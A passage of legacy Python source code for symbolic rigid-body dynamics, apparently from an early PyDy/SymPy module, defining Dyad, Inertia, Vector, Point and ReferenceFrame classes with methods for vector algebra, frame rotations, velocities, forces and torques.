scalar_part\n elif d_term.is_Pow:\n vec_dict[d_term.args[0]] = (vec_dict.get(d_term.args[0], 0)\n + scalar_part)\n else:\n raise NotImplementedError()\n return Vector(vec_dict)\n\n def rdot(self, other):\n \"\"\"Multplitcation by a UnitVector/Vector on the right.\n Dyad * v\n\n Returns a UnitVector / Vector\n \"\"\"\n vec_dict = {}\n if isinstance(other, (UnitVector, Vector)):\n for d_term, coeff in self.dict.items():\n if d_term.is_Mul:\n #print d_term\n scalar_part = coeff*other.dot(d_term.args[1])\n vec_dict[d_term.args[0]] = (vec_dict.get(d_term.args[0], 0)\n + scalar_part)\n elif d_term.is_Pow:\n #print d_term.args\n scalar_part = coeff*other.dot(d_term.args[0])\n vec_dict[d_term.args[0]] = (vec_dict.get(d_term.args[0], 0)\n + scalar_part)\n else:\n raise NotImplementedError()\n\n return Vector(vec_dict)\n\n def __str__(self):\n return PyDyStrPrinter().doprint(self)\n\n def express(self, frame):\n \"\"\"Express a Dyad with Unit Vectors fixed in a specified frame.\"\"\"\n dyad_dict = {}\n for d_term, coeff in self.dict.items():\n if d_term.is_Mul: # Case of A[1]*A[2]\n t1 = d_term.args[0].express(frame)\n t2 = d_term.args[1].express(frame)\n if isinstance(t1, UnitVector) and isinstance(t2, UnitVector):\n dyad_dict[t1*t2] = dyad_dict.get(t1*t2, 0) + coeff\n elif isinstance(t1, UnitVector) and isinstance(t2, Vector):\n for k, v in t2.dict.items():\n dyad_dict[t1*k] = dyad_dict.get(t1*k, 0) + coeff*v\n elif isinstance(t1, Vector) and isinstance(t2, UnitVector):\n for k, v in 
t1.dict.items():\n dyad_dict[k*t2] = dyad_dict.get(k*t2, 0) + coeff*v\n elif isinstance(t1, Vector) and isinstance(t2, Vector):\n for k1, v1 in t1.dict.items():\n for k2, v2 in t2.dict.items():\n dyad_dict[k1*k2] = dyad_dict.get(k1*k2, 0) + coeff*v1*v2\n if d_term.is_Pow:\n t1 = d_term.args[0].express(frame)\n if isinstance(t1, UnitVector):\n dyad_dict[t1**2] = dyad_dict.get(t1**2, 0) + coeff\n elif isinstance(t1, Vector):\n t2 = Vector(t1.dict) # make a copy\n for k1, v1 in t1.dict.items():\n for k2, v2 in t2.dict.items():\n dyad_dict[k1*k2] = dyad_dict.get(k1*k2, 0) + coeff*v1*v2\n return Dyad(dyad_dict)\n\nclass Inertia(Dyad):\n \"\"\"Inertia dyadic.\n \"\"\"\n def __init__(self, F, scalars):\n \"\"\"Specify frame, scalars as:\n frame - ReferenceFrame\n scalars - List or tuple of I11, I22, I33, I12, I23, I13 inertia scalars\n \"\"\"\n I11, I22, I33, I12, I23, I13 = scalars\n self.dict = {}\n for i, s in enumerate(scalars):\n if s == 0:\n continue\n if i <= 2:\n self.dict[F[i+1]*F[i+1]] = s\n elif i == 3:\n self.dict[F[1]*F[2]] = s\n self.dict[F[2]*F[1]] = s\n elif i == 4:\n self.dict[F[2]*F[3]] = s\n self.dict[F[3]*F[2]] = s\n elif i == 5:\n self.dict[F[1]*F[3]] = s\n self.dict[F[3]*F[1]] = s\n\nclass Vector(Basic):\n \"\"\"Symbolic vector expression.\n\n Internally represented as a dictionary whose keys are UnitVectors and whose\n values are the corresponding coefficient of that UnitVector.\n\n Example\n\n ::\n\n >>> N = ReferenceFrame(\"N\")\n >>> x, y, z = symbols('x y z')\n >>> v = Vector(x*N[1] + y*N[2] + z*N[3])\n >>> v.dict == {N[1]: x, N[2]: y, N[3]: z}\n True\n\n \"\"\"\n\n def __init__(self, v):\n \"\"\"Initialize a Vector object.\n\n Example\n\n\n Method 1:\n\n ::\n\n >>> N = ReferenceFrame(\"N\")\n >>> x, y, z = symbols('x y z')\n >>> v = Vector(x*N[1] + y*N[2] + z*N[3])\n >>> v\n x*n1> + y*n2> + z*n3>\n\n\n Method 2:\n\n ::\n\n >>> v = Vector({N[1]: x, N[2]: y, N[3]: z})\n >>> v\n x*n1> + y*n2> + z*n3>\n\n See also\n \"\"\"\n\n if isinstance(v, dict):\n for k in v.keys():\n v[k] = sympify(v[k])\n if v[k] == 0: v.pop(k)\n self.dict = v\n elif isinstance(v, Vector):\n self.dict = v.dict\n else:\n vdict = self.parse_terms(v)\n for k in vdict.keys():\n vdict[k] = sympify(vdict[k])\n if vdict[k] == 0: vdict.pop(k)\n self.dict = vdict\n\n def __str__(self):\n return PyDyStrPrinter().doprint(self)\n\n def __repr__(self):\n return PyDyStrPrinter().doprint(self)\n\n def __add__(self, other):\n \"\"\"Add two Vector objects.\n\n Example\n\n\n ::\n\n >>> N = ReferenceFrame('N')\n >>> v1 = Vector(2*N[1])\n >>> v2 = Vector(N[1] + 3*N[2])\n >>> v3 = v1 + v2\n >>> v3\n 3*n1> + 3*n2>\n\n See Also\n\n L{__sub__}\n \"\"\"\n if isinstance(other, Vector):\n sum = dict([(k, self.dict.get(k, 0) + other.dict.get(k, 0)) for k in\n (self.dict.keys() + other.dict.keys())])\n\n if len(sum) == 1 and sum[sum.keys()[0]] == 1:\n return sum.keys()[0]\n else:\n return Vector(sum)\n elif isinstance(other, UnitVector):\n return self.__add__(Vector({other: S(1)}))\n elif isinstance(other, (Add, Mul)):\n return self.__add__(Vector(other))\n else:\n raise NotImplementedError()\n\n def __sub__(self, other):\n \"\"\"Subtract two Vector objects.\n\n Example\n\n ::\n\n >>> N = ReferenceFrame('N')\n >>> v1 = Vector(2*N[1])\n >>> v2 = Vector(N[1] + 3*N[2])\n >>> v3 = v1 - v2\n >>> v3\n n1> - 3*n2>\n\n See Also\n\n L{__add__}\n \"\"\"\n if isinstance(other, Vector):\n dif = dict([(k, self.dict.get(k, 0) - other.dict.get(k, 0)) for k in\n (self.dict.keys() + other.dict.keys())])\n if len(dif) == 1 and dif[dif.keys()[0]] 
== 1:\n return dif.keys()[0]\n else:\n return Vector(dif)\n elif isinstance(other, UnitVector):\n return self.__sub__(Vector({other: S(1)}))\n elif isinstance(other, (Add, Mul)):\n return self.__sub__(Vector(other))\n else:\n raise NotImplementedError()\n\n def __eq__(self, other):\n \"\"\"Compares two Vector objects for equality.\n \"\"\"\n if isinstance(other, Vector):\n if self.dict == other.dict: # Easy case\n return True\n else: # More difficult case\n l1 = len(self.dict)\n k1 = self.dict.keys()\n l2 = len(other.dict)\n k2 = other.dict.keys()\n if l1 == 0 or l2 == 0:\n return False\n else:\n self_in_first_key_frame = self.express(k1[0].frame)\n other_in_first_key_frame = other.express(k1[0].frame)\n # Now the two vectors are both expressed in the same\n # coordinate frame\n if self_in_first_key_frame.dict == \\\n other_in_first_key_frame.dict:\n return True\n else:\n return False\n elif isinstance(other, UnitVector):\n v = self.express(other.frame)\n if isinstance(v, UnitVector):\n if v == other: return True\n else:\n return False\n else:\n other_as_Vector = Vector(other)\n return self == other_as_Vector\n\n \"\"\"\n def __rmul__(self, other):\n if isinstance(other, Dyad):\n return NotImplemented\n elif isinstance(other, Basic) and not isinstance(other, UnitVector):\n product = {}\n for k in self.dict:\n product[k] = other*self.dict[k]\n return Vector(product)\n else:\n return NotImplemented\n\n def __mul__(self, other):\n if isinstance(other, Dyad):\n return NotImplemented\n else:\n return Basic.__mul__(self, other)\n\n def __lmul__(self, other):\n if isinstance(other, Dyad):\n return NotImplemented\n elif isinstance(other, Symbol):\n prod = {}\n for k in self.dict:\n prod[k] = other*self.dict[k]\n else:\n return Basic.__mul__(self, other)\n \"\"\"\n\n def __neg__(self):\n return Vector(dict([(k, -self.dict[k]) for k in self.dict]))\n\n def coeffv(self, scalar):\n \"\"\"Vector coefficient of a scalar\n \"\"\"\n\n return Vector(dict([(k, self.dict[k].coeff(scalar)) for k in\n self.dict if self.dict[k].coeff(scalar) != None]))\n\n\n def cross(self, other):\n if isinstance(other, Vector):\n vcp = {}\n for k in self.dict:\n for ko in other.dict:\n kcrossko = k.cross(ko)\n if isinstance(kcrossko, UnitVector):\n vcp[kcrossko] = (vcp.get(kcrossko, 0) +\n self.dict[k]*other.dict[ko])\n else:\n for uv_term in kcrossko.dict:\n vcp[uv_term] = (vcp.get(uv_term, 0) +\n self.dict[k]*other.dict[ko]*\n kcrossko.dict[uv_term])\n return Vector(vcp)\n elif isinstance(other, UnitVector):\n vcp = {}\n for k in self.dict:\n k_cross_other = k.cross(other)\n if isinstance(k_cross_other, UnitVector):\n vcp[k_cross_other] = (vcp.get(k_cross_other, 0) +\n self.dict[k])\n else:\n for uv_term in k_cross_other.dict:\n vcp[uv_term] = (vcp.get(uv_term, 0) +\n self.dict[k]*k_cross_other.dict[uv_term])\n return Vector(vcp)\n elif isinstance(other, (Add, Mul)):\n return self.cross(Vector(other))\n else:\n raise NotImplementedError()\n\n def dot(self, other):\n \"\"\"Vector dot product.\n \"\"\"\n if isinstance(other, Vector):\n s = S(0)\n for k in self.dict:\n s += sum([self.dict[k]*other.dict[ko]*k.dot(ko) for ko in\n other.dict])\n return s\n elif isinstance(other, UnitVector):\n s = sum([self.dict[k]*k.dot(other) for k in self.dict])\n return s\n elif isinstance(other, (Add, Mul)):\n return self.dot(Vector(other))\n elif isinstance(other, Dyad):\n return other.ldot(self)\n else:\n raise NotImplementedError()\n\n def dt(self, frame):\n if isinstance(frame, ReferenceFrame):\n dt_self = {}\n for k in self.dict:\n # 
First term comes from time differentiating in the frame of\n                # the UnitVector frame of k\n                dt_self[k] = dt_self.get(k, 0) + (self.dict[k]).diff(t)\n                # Second term comes from the omega cross term\n                t2 = k.frame.ang_vel(frame).cross(k)\n                if isinstance(t2, UnitVector):\n                    dt_self[t2] = dt_self.get(t2, 0) + self.dict[k]\n                else:  # Must be a Vector\n                    for term in t2.dict:\n                        dt_self[term] = (dt_self.get(term, 0) +\n                            self.dict[k]*t2.dict[term])\n            if len(dt_self) == 1:\n                if dt_self.values()[0] == 1:\n                    return dt_self.keys()[0]  # Return a UnitVector\n                else:\n                    return Vector(dt_self)\n            else:\n                return Vector(dt_self)\n\n    def express(self, frame):\n        \"\"\"Expresses a Vector with UnitVectors fixed in the specified frame.\n        \"\"\"\n\n        new = {}\n\n        for uv in self.dict.keys():\n            # Convert each unit vector term to the desired frame\n            uv_in_frame = uv.express(frame)\n\n            # Case for UnitVectors\n            if isinstance(uv_in_frame, UnitVector):\n                new[uv_in_frame] = new.get(uv_in_frame, 0) + self.dict[uv]\n\n            # Case for Vectors\n            elif isinstance(uv_in_frame, Vector):\n                # Go through each term\n                for uv_term, coef in uv_in_frame.dict.items():\n                    new[uv_term] = (new.get(uv_term, 0) +\n                            self.dict[uv]*coef)\n\n        for uv in new.keys():\n            new[uv] = new[uv].expand().subs(uv.frame.NewtonianReferenceFrame.csqrd_dict).expand()\n            #new[uv] = expand(trigsimp(new[uv]))\n            #new[uv] = trigsimp(expand(trigsimp(new[uv])))\n            if new[uv] == 0: new.pop(uv)\n\n        if len(new) == 1 and new.values()[0] == 1:\n            return new.keys()[0]\n        else:\n            return Vector(new)\n\n    @property\n    def mag(self):\n        \"\"\"Magnitude of a Vector.\n        \"\"\"\n        return sqrt(self.mag_sqr)\n\n    @property\n    def mag_sqr(self):\n        \"\"\"Magnitude squared of a Vector.\n        \"\"\"\n        m = 0\n        s = set([])\n        for k1, k2 in ((x,y) for x in self.dict for y in self.dict):\n            if (k2, k1) in s:\n                continue\n            else:\n                s.add((k1, k2))\n        for k1, k2 in s:\n            if k1 == k2:\n                #m += expand(self.dict[k1]**2)\n                m += self.dict[k1]**2\n            else:\n                #m += 2*expand(self.dict[k1]*self.dict[k2]*dot(k1, k2))\n                m += 2*self.dict[k1]*self.dict[k2]*dot(k1, k2)\n\n        # Try to factor things if possible\n        \"\"\"\n        if isinstance(m, Add):\n            trigterms = m.atoms(sin, cos)\n            replacements = []\n            for i, t in enumerate(trigterms):\n                replacements.append(Symbol('Trig%d' % i, dummy=True))\n            subsdict = dict(zip(trigterms, replacements))\n            rsubsdict = dict(zip(replacements, trigterms))\n            trigadd = []\n            otheradd = []\n            for arg in m.args:\n                if arg.atoms(sin, cos):\n                    trigadd.append(arg)\n                else:\n                    otheradd.append(arg)\n            trigexpr = S(0)\n            otherexpr = S(0)\n            for term in trigadd: trigexpr += term\n            for term in otheradd: otherexpr += term\n            trigexprs = trigexpr.subs(subsdict)\n            trigexprsf = factor(trigexprs)\n            trigexprf = trigexprsf.subs(rsubsdict)\n            m = trigexprf + otherexpr\n            #m = trigexpr + otherexpr\n        \"\"\"\n        return m\n\n    @property\n    def normalized(self):\n        v = Vector(0)\n        m = self.mag\n        for k in self.dict:\n            v.dict[k] = self.dict[k] / m\n        return v\n\n    def parse_terms(self, v):\n        \"\"\"\n        Given a Sympy expression with UnitVector terms, return a dictionary\n        whose keys are the UnitVectors and whose values are the coefficients\n        of the UnitVectors\n        \"\"\"\n\n        if v == 0:\n            return {}\n        elif isinstance(v, UnitVector):\n            return {v: S(1)}\n        elif isinstance(v, Vector):\n            return v.dict\n        elif isinstance(v, Mul):\n            v = v.expand()  # Could expand out to an Add instance\n            if isinstance(v, Add):\n                return self.parse_terms(v)  # If this happens, reparse\n            elif isinstance(v, Mul):  # Otherwise it is still a Mul instance\n                \"\"\"if v.atoms(Vector):\n                i = 
v.args.index(list(v.atoms(Vector))[0])\n scalarpart = S(1)\n for j, term in enumerate(v.args):\n if j == i: continue\n else:\n scalarpart *= term\n newvdict = {}\n for k in v.args[i].dict:\n newvdict[k] = scalarpart*v.args[i].dict[k]\n return newvdict\n \"\"\"\n args = v.args\n term_types_list = [type(terms) for terms in args]\n if UnitVector in term_types_list:\n i = term_types_list.index(UnitVector)\n coefs = args[:i] + args[i+1:]\n prod_coefs = S(1)\n for p in coefs:\n prod_coefs *= p\n return {args[i]: prod_coefs}\n elif Vector in term_types_list:\n i = term_types_list.index(Vector)\n coefs = args[:i] + args[i+1:]\n prod_coefs = S(1)\n for p in coefs:\n prod_coefs *= p\n for k in args[i].dict.keys():\n args[i].dict[k] *= prod_coefs\n return args[i].dict\n else:\n raise NotImplementedError()\n else:\n raise NotImplementedError()\n elif isinstance(v, Pow):\n v = v.expand()\n # I don't think this will ever be entered into.\n # You would have to have something like A[1]*A[2],\n # which isn't a valid vector expression.\n # Or q1*q2, which is a scalar expression.\n for b in v.args:\n if isinstance(b, UnitVector):\n return {b: v.coeff(b)}\n elif isinstance(v, Add):\n v = v.expand()\n terms = {}\n for add_term in v.args:\n if isinstance(add_term, (Mul, Pow)):\n add_term_dict = self.parse_terms(add_term)\n elif isinstance(add_term, UnitVector):\n add_term_dict = {add_term: S(1)}\n elif isinstance(add_term, Vector):\n add_term_dict = add_term.dict\n else:\n raise NotImplementedError()\n for k in add_term_dict:\n terms[k] = terms.get(k, 0) + add_term_dict[k]\n return terms\n else:\n return NotImplemented\n\n def partials(self, u_list):\n \"\"\"Computes partial velocities.\n \"\"\"\n return [self.coeffv(u) for u in u_list]\n\n def subs(self, subs_dict):\n return Vector(dict([(k, self.dict[k].subs(subs_dict)) for k in\n self.dict]))\n\n def expandv(self):\n \"\"\"Expands each coefficient of a Vector's UnitVectors\n \"\"\"\n ex = {}\n for uv, c in self.dict.items():\n ex[uv] = c.expand()\n return Vector(ex)\n\nclass Point(object):\n \"\"\"\n A class for keeping track of the relative position, velocity, and\n acceleration of points. Points can be created in three ways:\n\n Method 1:\n P = Point('P')\n\n Method 2:\n Q = P.locate('Q', r)\n\n Method 3:\n Q = P.locate('Q', r, frame)\n\n Methods 2 and 3 automatically form the velocity and acceleration of the new\n point Q relative to the parent point P.\n\n Method 1 is used to create the 'base' point from which all other points are\n derived. Method 1 is automatically called when a 'base' reference frame is\n created, this point corresponds to what is commonly known as the inertial\n origin, and this syntax is typically never used explicitly. Method 2\n creates a new point Q, located relative to point P by the Vector r. 
Method\n 3 creates a new point Q, located relative to point P by the Vector r, but\n it is assumed that this point is fixed in frame, so that the velocity of Q\n relative to P is the velocity of P plus the cross product of the angular\n velocity of frame relative to the Inertial Frame with r.\n \"\"\"\n\n def __init__(self, name, relativeposition=None, parentpoint=None,\n fixedinframe=None, mass=None, force=None):\n # When instantiated by ReferenceFrame\n if not any([relativeposition, parentpoint]):\n self.name = name\n self.point_list = [self]\n self.pos = {self: Vector(0)}\n self._vrel = Vector(0)\n self.NewtonianFrame = fixedinframe\n self._fixedin = set([fixedinframe])\n self.parentpoint = None\n self.children = []\n self.mass = 0\n self.force = Vector(0)\n # When instantiated by locate method\n elif all([name, relativeposition, parentpoint]):\n relativeposition = Vector(relativeposition)\n self.name = name\n self.parentpoint = parentpoint\n self.children = []\n parentpoint.children.append(self)\n # Initialize the inertial velocity, relative to the parent point\n self._vrel = {}\n # Assign the vector pointing back to the parent to the new point's\n # position\n self.pos = {parentpoint: -relativeposition}\n # Add the position vector pointing from the parent to the new point\n # to the parent's pos dictionary\n parentpoint.pos[self] = relativeposition\n # Add self to the beginning of the parent's point list\n self.point_list = [self] + parentpoint.point_list\n # Copy the Newtonian frame from the parent point.\n self.NewtonianFrame = parentpoint.NewtonianFrame\n # Set the mass and force\n self.mass = 0 if mass == None else mass\n self.force = Vector(0) if force == None else force\n # If an optional frame argument is specified, append it to the\n # _fixedin list of the parent and create the list for the new point\n if isinstance(fixedinframe, ReferenceFrame):\n parentpoint._fixedin.add(fixedinframe)\n self._fixedin = set([fixedinframe])\n self._vrel = cross(fixedinframe.ang_vel(self.NewtonianFrame),\n relativeposition)\n elif fixedinframe == None:\n self._fixedin = set([])\n self._vrel = relativeposition.dt(self.NewtonianFrame)\n else:\n raise TypeError('fixedinframe must be a ReferenceFrame type')\n else:\n raise NotImplementedError()\n\n def apply_force(self, force, other=None, reset=False):\n \"\"\"Apply force to a point or particle.\n\n Can be used to apply a force to a point or particle.\n\n Repeated calls to apply_force are additive.\n\n If optional argument other is specified, a force of equal magnitude\n but opposite sign will be applied to the other point.\n\n If you need to reset the applied force to zero, use optional parameter\n reset=True\n \"\"\"\n if other==None:\n if reset==False:\n self.force += Vector(force)\n elif reset==True:\n self.force = Vector(force)\n else:\n raise TypeError('reset must be a boolean')\n elif isinstance(other, Point):\n if reset==False:\n force = Vector(force)\n self.force += force\n other.force -= force\n elif reset==True:\n force = Vector(force)\n self.force = force\n other.force = -force\n else:\n raise TypeError('reset must be a boolean')\n else:\n raise TypeError('other must be a Point')\n\n def locate(self, name, r, frame=None, mass=None, force=None):\n \"\"\"Returns a new Point located relative to the parent point.\n\n Introduces the concept of a point fixed in a frame.\n\n Method 1:\n\n P1 = N.O.locate('P1', r)\n\n Method 2:\n\n P2 = N.O.locate('P2', r, frame)\n\n Both methods assign the relative position vector r in an identical 
way,\n they differ in how the velocity of the point is determined. Method 1\n takes the time derivative of the supplied vector r in the\n NewtonianFrame. Method 2 treats the new point as fixed in the supplied\n frame, so the velocity is calculated as the cross product of the\n angular velocity of frame relative to the NewtonianFrame with the\n supplied position vector r.\n \"\"\"\n r = Vector(r)\n newpoint = Point(name, relativeposition=r, \\\n parentpoint=self, fixedinframe=frame)\n newpoint.mass = mass if mass is not None else 0\n newpoint.force = Vector(force) if force is not None else Vector(0)\n return newpoint\n\n def rel(self, other):\n \"\"\"\n Returns the position from Point other to Point self, i.e., the position\n of self relative to other.\n \"\"\"\n if isinstance(other, Point):\n pl = self.get_point_list(other)\n pos = Vector(0)\n for i, p in enumerate(pl[:-1]):\n pos -= pl[i].pos[pl[i+1]]\n return pos\n elif other is None:\n return Vector(0)\n\n def vel(self, point=None, frame=None):\n \"\"\"Calculate the velocity of a point.\n\n Used without arguments, vel() returns the velocity of self\n relative to the Newtonian Frame, taking into account whether points\n have been declared as fixed in a frame or not.\n\n Used with arguments, .vel(point, frame) returns the velocity of self\n relative to point, as viewed by an observer fixed in frame.\n \"\"\"\n\n v = Vector(0)\n if point == frame == None:\n if hasattr(self, 'abs_vel'):\n return self.abs_vel\n else:\n for p in self.point_list:\n v += p._vrel\n elif isinstance(point, Point) and isinstance(frame, ReferenceFrame):\n # Get the point list from point to self\n point_list = point.get_point_list(self)\n for i, pa in enumerate(point_list[:-1]):\n pb = point_list[i+1]\n set_intersect = pa._fixedin & pb._fixedin\n # Case when the two points are not fixed in the same frame\n if len(set_intersect) == 0:\n v += dt(pb.rel(pa), frame)\n # Case when the two points are fixed in the same frame\n elif len(set_intersect) == 1:\n v += cross(set_intersect.pop().ang_vel(frame),\n pb.rel(pa))\n else:\n raise NotImplementedError('Somehow these two points are \\\n both fixed in 2 or more of the same frames')\n return v\n\n def get_point_list(self, other=None):\n \"\"\"\n Gets the list of Points between Point self and Point other, including both.\n \"\"\"\n if other == None:\n return self.point_list\n elif self == other:\n return [self]\n else:\n r2t = list(reversed(other.point_list))\n\n if len(self.point_list) == 1:\n return r2t\n elif len(r2t) == 1:\n return self.point_list\n\n r1t = list(reversed(self.point_list))\n i = 1\n\n while r1t[i] == r2t[i]:\n del r1t[i-1]\n del r2t[i-1]\n if len(r1t)<2 or len(r2t)<2:\n break\n\n r1t.reverse()\n return r1t[:-1] + r2t\n\n def __str__(self):\n return '<Point %s>' % self.name\n\n def __repr__(self):\n return '<Point %s>' % self.name\n\nclass ReferenceFrame(object):\n \"\"\"\n A standard reference frame with 3 mutually perpendicular unit vectors.\n Reference frames can be created in two ways:\n\n Method 1:\n A = ReferenceFrame('A')\n\n Method 2:\n B = A.rotate('B', axis, angle)\n where:\n axis = 1, 2 or 3\n angle is the radian measure of the rotation.\n\n Method 1 typically is used to create the 'base' frame from which all other\n frames are derived. Method 2 is used to create all subsequent frames. In\n doing so, circular definitions of frames are avoided and a tree structure\n of reference frames is created. 
The first argument is a string and\n determines how the basis UnitVectors are printed.\n \"\"\"\n\n def __init__(self, s, matrix=None, frame=None, omega=None):\n \"\"\"\n If instantiated without the optional arguments, the 'base'\n ReferenceFrame is created. The optional arguments are automatically\n generated by the rotate() method for the purpose of creating a new\n ReferenceFrame object. See rotate() method for details of the optional\n arguments.\n \"\"\"\n self.children = []\n self.name = s\n self.triad = [UnitVector(self, i) for i in (1,2,3)]\n self.transforms = {}\n self.parentframe = frame\n self.torque = Vector(0)\n\n if not any([matrix, frame, omega]):\n self.ref_frame_list = [self]\n self.O = Point(s + 'O', fixedinframe=self)\n self.point_list = [self.O]\n self.NewtonianReferenceFrame = self\n self.uv_dot_products = {}\n self.uv_cross_products = {}\n self.inertia = Inertia(self, (0,0,0,0,0,0))\n else:\n self.ref_frame_list = [self] + frame.ref_frame_list[:]\n self.NewtonianReferenceFrame = frame.NewtonianReferenceFrame\n\n if isinstance(omega, Vector):\n self._wrel = omega\n frame._wrel_children[self] = -omega\n elif isinstance(omega, tuple):\n # Case of simple rotations about 1 axis\n self._wrel = Vector(omega[1] * self.triad[omega[0]-1])\n frame._wrel_children[self] = Vector(-omega[1] *\n self.triad[omega[0]-1])\n else:\n self._wrel = Vector(0)\n\n self._wrel_children = {}\n\n\n if frame is not None:\n frame.children.append(self)\n self.append_transform(frame, matrix)\n frame.append_transform(self, matrix.T)\n\n def __getitem__(self, i):\n \"\"\"\n Reference the UnitVectors that are attached to a reference frame.\n Example:\n A = ReferenceFrame('A')\n\n A[1], A[2], A[3] are the three basis vectors of the A frame.\n \"\"\"\n if i == 1 or i == 2 or i ==3:\n return self.triad[i-1]\n else:\n raise NotImplementedError()\n\n def append_transform(self, frame, matrix):\n \"\"\"\n Appends 'matrix' to the transforms dict which transform vectors\n expressed in self basis vectors to the basis vectors of the frame\n 'frame'\n \"\"\"\n # We just append it to our \"transforms\" dict.\n self.transforms[frame] = matrix\n\n def rotate(self, name, axis, angle, I=None, I_frame=None):\n \"\"\"Returns a new rotated reference frame.\n\n Perform simple rotations, Euler rotations, space fixed rotations, axis\n angle rotations, Euler parameter rotations, or Rodrigues parameter\n rotations.\n\n Perform a simple rotation about the 1, 2, or 3 axis, by an amount\n specified by angle, to create a new ReferenceFrame object.\n Automatically generates the angular velocity of the new frame with\n respect to the parent frame.\n\n Currently the orientation is stored as the direction cosine matrix,\n further work should implement quaternions. 
Extra functionality such as\n the ability to specify a set of Euler angles or an arbitrary axis and\n angle needs to be implemented.\n\n When rotate is used to generate a new ReferenceFrame, the orientation\n of that reference frame relative to its parent reference frame is\n stored in both frames in the form of the direction cosine matrix.\n Additionally, the angular velocity of the new reference frame relative\n to the parent frame (and vice versa) is stored with the new reference\n frame (and the parent reference frame).\n \"\"\"\n\n if not isinstance(angle, (list, tuple)):\n if axis in set((1, 2, 3)):\n matrix = self._rot(axis, angle)\n omega = (axis, angle.diff(t))\n elif axis in set((-1, -2, -3)):\n matrix = self._rot(-axis, -angle)\n omega = (-axis, -angle.diff(t))\n elif isinstance(axis, (UnitVector, Vector)):\n raise NotImplementedError(\"Axis angle rotations not \\\n implemented.\")\n else:\n raise ValueError(\"Invalid axis\")\n newframe = ReferenceFrame(name, matrix, self, omega)\n self[abs(axis)].common_frames.add(newframe)\n newframe[abs(axis)].common_frames.add(self)\n if I == None and I_frame==None:\n newframe.inertia = Inertia(newframe, (0, 0, 0, 0, 0, 0))\n elif I != None and I_frame != None:\n newframe.inertia = Inertia(I_frame, I)\n elif I != None and I_frame == None:\n newframe.inertia = Inertia(newframe, I)\n else:\n raise NotImplementedError()\n return newframe\n else:\n if len(angle) == 3:\n csqrd_dict = {cos(angle[0])**2:1-sin(angle[0])**2,\\\n cos(angle[1])**2:1-sin(angle[1])**2,\\\n cos(angle[2])**2:1-sin(angle[2])**2}\n rot_type = str(axis)\n if rot_type in set(('BODY123', 'BODY132', 'BODY231', 'BODY213',\n 'BODY312', 'BODY321', 'BODY121', 'BODY131', 'BODY232',\n 'BODY212', 'BODY313', 'BODY323', 'SPACE123', 'SPACE132',\n 'SPACE231', 'SPACE213', 'SPACE312', 'SPACE321', 'SPACE121',\n 'SPACE131', 'SPACE232', 'SPACE212', 'SPACE313', 'SPACE323')):\n if rot_type[0] == 'B': # Body fixed (Euler) angles\n a1 = int(rot_type[4])\n a2 = int(rot_type[5])\n a3 = int(rot_type[6])\n C = self._rot(a1, angle[0]) * self._rot(a2, angle[1]) * \\\n self._rot(a3, angle[2])\n else: # Space fixed angles\n a1 = int(rot_type[5])\n a2 = int(rot_type[6])\n a3 = int(rot_type[7])\n C = self._rot(a3, angle[2]) * self._rot(a2, angle[1]) * \\\n self._rot(a1, angle[0])\n # From Spacecraft Dynamics, by Kane, Likins, Levinson\n # Eqns 1.10.(5-7), pg. 
47\n # Angular velocity components in new frame's basis vectors\n\n w1 = (C[0,2]*(C[0,1].diff(t)) + C[1,2]*(C[1,1].diff(t)) + \\\n C[2,2]*(C[2,1].diff(t))).expand().subs(csqrd_dict).expand()\n\n w2 = (C[1,0]*(C[1,2].diff(t)) + C[2,0]*(C[2,2].diff(t)) + \\\n C[0,0]*(C[0,2].diff(t))).expand().subs(csqrd_dict).expand()\n\n w3 = (C[2,1]*(C[2,0].diff(t)) + C[0,1]*(C[0,0].diff(t)) + \\\n C[1,1]*(C[1,0].diff(t))).expand().subs(csqrd_dict).expand()\n\n\n # First initialize with zero angular velocity\n newFrame = ReferenceFrame(name, C, self, Vector({}))\n # Angular velocity vector of newFrame relative to self\n omega = Vector({newFrame[1]: w1, newFrame[2]: w2,\n newFrame[3]: w3})\n newFrame.set_omega(omega, self, force=True)\n if I == None and I_frame==None:\n newFrame.inertia = Inertia(newFrame, (0, 0, 0, 0, 0, 0))\n elif I != None and I_frame != None:\n newFrame.inertia = Inertia(I_frame, I)\n elif I != None and I_frame == None:\n newFrame.inertia = Inertia(newFrame, I)\n else:\n raise NotImplementedError()\n return newFrame\n else:\n raise NotImplementedError(\"angle must be a list/tuple of \\\n length 3\")\n\n def _rot(self, axis, angle):\n \"\"\"Returns direction cosine matrix for simple 1,2,3 rotations\n\n \"\"\"\n if axis == 1:\n return Matrix([[1, 0, 0],\n [0, cos(angle), -sin(angle)],\n [0, sin(angle), cos(angle)]])\n elif axis == 2:\n return Matrix([[cos(angle), 0, sin(angle)],\n [0, 1, 0],\n [-sin(angle), 0, cos(angle)]])\n elif axis == 3:\n return Matrix([[cos(angle), -sin(angle), 0],\n [sin(angle), cos(angle), 0],\n [0, 0, 1]])\n\n def __str__(self):\n return '<Frame %s>' % self.name\n\n def __repr__(self):\n return \"<Frame %s>\" % self.name\n\n def get_frames_list(self, frame):\n \"\"\"\n Returns a list of frames from \"self\" to \"frame\", including both.\n\n Example::\n\n N - A - D - E - F\n \\\n B - C\n\n Then:\n\n C.get_frames_list(F) == [C, B, A, D, E, F]\n F.get_frames_list(C) == [F, E, D, A, B, C]\n \"\"\"\n if self == frame:\n return [self]\n else:\n r2t = list(reversed(frame.ref_frame_list))\n\n if len(self.ref_frame_list) == 1:\n return r2t\n elif len(r2t) == 1:\n return self.ref_frame_list\n\n r1t = list(reversed(self.ref_frame_list))\n i = 1\n while r1t[i] == r2t[i]:\n del r1t[i-1]\n del r2t[i-1]\n if len(r1t)<2 or len(r2t)<2:\n break\n\n r1t.reverse()\n return r1t[:-1] + r2t\n\n def apply_torque(self, torque, other=None, reset=False):\n \"\"\"Apply torque to a reference frame or rigid body.\n\n Can be used to apply a torque to a reference frame or rigid body.\n\n Repeated calls to apply_torque are additive.\n\n If optional argument other is specified, a torque of equal magnitude\n but opposite sign will be applied to the other reference frame.\n\n If you need to reset the applied torque to zero, use optional parameter\n reset=True\n \"\"\"\n if other==None:\n if reset==False:\n self.torque += Vector(torque)\n elif reset==True:\n self.torque = Vector(torque)\n else:\n raise TypeError('reset must be a boolean')\n elif isinstance(other, ReferenceFrame):\n if reset==False:\n torque = Vector(torque)\n self.torque += torque\n other.torque -= torque\n elif reset==True:\n torque = Vector(torque)\n self.torque = torque\n other.torque = -torque\n else:\n raise TypeError('reset must be a boolean')\n else:\n raise TypeError('other must be a ReferenceFrame')\n\n def get_rot_matrices(self, frame):\n \"\"\"\n Returns a list of matrices to get from self to frame.\n # local function\n def 